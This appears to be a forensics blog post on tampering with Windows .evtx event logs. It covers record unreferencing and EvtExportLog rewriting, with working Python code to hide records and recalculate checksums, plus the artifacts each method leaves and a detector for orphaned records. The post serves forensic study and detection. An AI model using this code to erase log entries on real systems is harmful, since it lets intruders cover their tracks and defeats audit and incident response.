Event Log Tampering Part 2: Manipulating Individual Event Logs

  • Evtx Structure & Manual Event Editing (A must-read to understand the following sections)
  • Event Record Unreferencing (Shadow Brokers leak of NSA’s DanderSpritz/eventlogedit)
  • Rewriting Logs with WinAPI EvtExportLog (3gstudent’s evolutions of eventlogedit)

Manipulating Individual Event Logs

  1. Stop the Event Log service and copy the .evtx
  2. Modify your events and recalculate the event record checksum in the chunk header

What this approach leaves behind:
  • Service Control Manager Event ID 7035
  • Command-line usage of service manipulation (sc.exe)
  • File access to the .evtx itself (moving, copying or accessing)

Event Record Unreferencing

https://blog.fox-it.com/2017/12/08/detection-and-recovery-of-nsas-covered-up-tracks/
Concept explained with dogs :)
  1. Edit the size of the previous Event Record to hide the target record
  2. (Technically optional, but skipping it leaves a gap in the EventRecordID sequence) Update all subsequent Event Record IDs, which means every following chunk needs its checksums recalculated as well
  3. Update and recalculate the following in the Chunk Header
    - Last event record number
    - Last event record identifier
    - Last event record data offset
    - Event Record checksum
    - Chunk Header Checksum
  4. Update and recalculate the following in the File Header
    - Next Record Identifier (e.g. decremented by 1 if one event was deleted)
    - File Header Checksum
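The procedure above, and the checksum recalculation from the first section, worked on a constructed chunk. This is an added example, not code from the original post, from DanderSpritz/eventlogedit or from Fox-IT's tooling: it builds a 64 KiB EVTX chunk with three dummy records (the payloads are placeholder bytes, not real BinXML), hides the middle one by growing its predecessor's size field over it, updates the chunk header fields and both CRC32s, adjusts the file header's next record identifier, and finally shows the detection side: a record magic that the size chain never reaches. Field offsets follow the public EVTX format documentation (libevtx); the record IDs, payloads and chunk count are made up for the demonstration.

```python
"""Event record unreferencing on a constructed EVTX chunk and file header.
Added example for the steps above, not code from the original post, from
DanderSpritz/eventlogedit or from Fox-IT's tooling. Field offsets follow the
public EVTX format documentation (libevtx); record payloads are dummy bytes."""
import struct
import zlib

CHUNK_SIZE = 0x10000                # one 64 KiB chunk
CHUNK_HDR_SIZE = 512                # records start right after the chunk header
RECORD_MAGIC = b"\x2a\x2a\x00\x00"

def crc32(data) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF

def build_record(record_id: int, payload: bytes) -> bytes:
    """magic | size | record id | FILETIME (constructed) | payload | copy of size."""
    size = 4 + 4 + 8 + 8 + len(payload) + 4
    return (RECORD_MAGIC + struct.pack("<IQQ", size, record_id, 0x01D3_0000_0000_0000 + record_id)
            + payload + struct.pack("<I", size))

def fix_chunk_checksums(chunk: bytearray) -> None:
    free = struct.unpack_from("<I", chunk, 48)[0]                              # free space offset
    struct.pack_into("<I", chunk, 52, crc32(chunk[CHUNK_HDR_SIZE:free]))       # event records checksum
    struct.pack_into("<I", chunk, 124, crc32(chunk[0:120] + chunk[128:512]))  # chunk header checksum

def verify_chunk(chunk) -> bool:
    free, rec_crc = struct.unpack_from("<II", chunk, 48)
    return (rec_crc == crc32(chunk[CHUNK_HDR_SIZE:free]) and
            struct.unpack_from("<I", chunk, 124)[0] == crc32(chunk[0:120] + chunk[128:512]))

def build_chunk(first_id: int, payloads: list) -> bytearray:
    chunk = bytearray(CHUNK_SIZE)
    chunk[0:8] = b"ElfChnk\x00"
    off = CHUNK_HDR_SIZE
    for i, payload in enumerate(payloads):
        rec = build_record(first_id + i, payload)
        last_off, off = off, off + len(rec)
        chunk[last_off:off] = rec
    last_id = first_id + len(payloads) - 1
    # first/last record number, first/last record identifier, header size, last record offset, free space offset
    struct.pack_into("<QQQQIII", chunk, 8, first_id, last_id, first_id, last_id, 128, last_off, off)
    fix_chunk_checksums(chunk)
    return chunk

def walk_records(chunk):
    """Follow the size chain the way a normal parser (or Event Viewer) does."""
    free = struct.unpack_from("<I", chunk, 48)[0]
    recs, off = [], CHUNK_HDR_SIZE
    while off < free:
        magic, size, rid = struct.unpack_from("<4sIQ", chunk, off)
        if magic != RECORD_MAGIC:
            raise ValueError(f"bad record magic at chunk offset {off}")
        recs.append((off, size, rid))
        off += size
    return recs

def unreference_record(chunk: bytearray, target_id: int, renumber: bool = True) -> None:
    """Steps 1-3: grow the previous record over the target, then fix the chunk header."""
    recs = walk_records(chunk)
    idx = next(i for i, (_, _, rid) in enumerate(recs) if rid == target_id)
    if idx == 0:
        raise ValueError("first record of a chunk has no predecessor to grow")
    prev_off, prev_size, _ = recs[idx - 1]
    new_size = prev_size + recs[idx][1]
    struct.pack_into("<I", chunk, prev_off + 4, new_size)             # size at record start
    struct.pack_into("<I", chunk, prev_off + new_size - 4, new_size)  # trailing copy of size
    if renumber:  # step 2: skipping it leaves a gap in the EventRecordID sequence
        for off, _, rid in recs[idx + 1:]:
            struct.pack_into("<Q", chunk, off + 8, rid - 1)
    last_off, _, last_id = walk_records(chunk)[-1]
    struct.pack_into("<Q", chunk, 16, last_id)   # last event record number
    struct.pack_into("<Q", chunk, 32, last_id)   # last event record identifier
    struct.pack_into("<I", chunk, 44, last_off)  # last event record data offset
    fix_chunk_checksums(chunk)

def find_unreferenced(chunk):
    """Detection: record magics in the used area that the size chain never reaches."""
    free = struct.unpack_from("<I", chunk, 48)[0]
    referenced = {off for off, _, _ in walk_records(chunk)}
    return [(off, struct.unpack_from("<Q", chunk, off + 8)[0])
            for off in range(CHUNK_HDR_SIZE, free - 4)
            if chunk[off:off + 4] == RECORD_MAGIC and off not in referenced]

def build_file_header(next_id: int, num_chunks: int) -> bytearray:
    hdr = bytearray(4096)
    hdr[0:8] = b"ElfFile\x00"
    # first chunk, last chunk, next record identifier, header size, minor/major version, block size, chunk count
    struct.pack_into("<QQQIHHHH", hdr, 8, 0, num_chunks - 1, next_id, 128, 1, 3, 4096, num_chunks)
    struct.pack_into("<I", hdr, 124, crc32(hdr[0:120]))   # file header checksum
    return hdr

def adjust_next_record_id(hdr: bytearray, deleted: int) -> int:
    """Step 4: lower the next record identifier by the records removed, then re-checksum."""
    new_next = struct.unpack_from("<Q", hdr, 24)[0] - deleted
    struct.pack_into("<Q", hdr, 24, new_next)
    struct.pack_into("<I", hdr, 124, crc32(hdr[0:120]))
    return new_next

def verify_file_header(hdr) -> bool:
    return struct.unpack_from("<I", hdr, 124)[0] == crc32(hdr[0:120])
```

After `unreference_record`, `walk_records` and both checksums look perfectly healthy, which is exactly why a checksum-only integrity check does not catch this. The hidden record's own header (magic, size, EventRecordID) is still sitting inside the grown predecessor, and `find_unreferenced` recovers it by scanning for the magic at offsets the size chain skips. The example refuses to hide the first record of a chunk, since there is no predecessor in the same chunk to grow, and it handles one chunk only: with `renumber=True` on a multi-chunk file, every later chunk would need the same renumbering and checksum pass.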

Rewriting Logs with WinAPI EvtExportLog

https://docs.microsoft.com/en-gb/windows/win32/api/winevt/nf-winevt-evtexportlog
https://github.com/3gstudent/Eventlogedit-evtx--Evolution/blob/master/DeleteRecord-EvtExportLog.cpp
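The same idea called from Python through ctypes, as an added example that is not 3gstudent's code: EvtExportLog takes a channel (or file) path, an XPath query and a target path, and writes a fresh .evtx containing only the events the query matches, so a query that excludes an EventRecordID produces a copy of the log without that record. The query shape is an assumption based on the API's only filtering mechanism; the channel name, record ID and output path are placeholders.

```python
"""Rewrite an event log channel through EvtExportLog, dropping one record.
Added example, not 3gstudent's code. It assumes the record is excluded via the
Query argument (an XPath filter on EventRecordID), the only filtering that
EvtExportLog offers; channel, record ID and output path are placeholders."""
import ctypes
import sys

EVT_EXPORTLOG_CHANNEL_PATH = 0x1   # EvtExportLogChannelPath: Path names a channel, not a file

def exclusion_query(record_ids) -> str:
    """XPath that matches every event except the listed EventRecordIDs."""
    if not record_ids:
        return "*"
    terms = " and ".join(f"EventRecordID != {int(r)}" for r in record_ids)
    return f"*[System[{terms}]]"

def export_without(channel: str, record_ids, target_path: str) -> str:
    """EvtExportLog(NULL session, channel, query, target, ChannelPath); returns the query used."""
    if sys.platform != "win32":
        raise RuntimeError("EvtExportLog lives in wevtapi.dll and only runs on Windows")
    from ctypes import wintypes
    wevtapi = ctypes.WinDLL("wevtapi", use_last_error=True)
    wevtapi.EvtExportLog.argtypes = [wintypes.HANDLE, wintypes.LPCWSTR, wintypes.LPCWSTR,
                                     wintypes.LPCWSTR, wintypes.DWORD]
    wevtapi.EvtExportLog.restype = wintypes.BOOL
    query = exclusion_query(record_ids)
    if not wevtapi.EvtExportLog(None, channel, query, target_path, EVT_EXPORTLOG_CHANNEL_PATH):
        raise ctypes.WinError(ctypes.get_last_error())
    return query

if __name__ == "__main__":
    # Placeholder channel, record ID and output path (assumptions, not from the post).
    print(export_without("System", [1234], r"C:\Windows\Temp\System-rewritten.evtx"))
```

The flag value 1 (EvtExportLogChannelPath) tells the API that the first path is a channel name; 2 (EvtExportLogFilePath) re-exports an existing .evtx instead. Because the API writes a brand-new file, this only rewrites a copy: swapping it in for the live channel file still needs the Event Log service stopped, as in the first procedure on this page, and the surviving events keep their original EventRecordIDs, so the gap in the sequence stays visible.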

Covering All Bases

svch0st
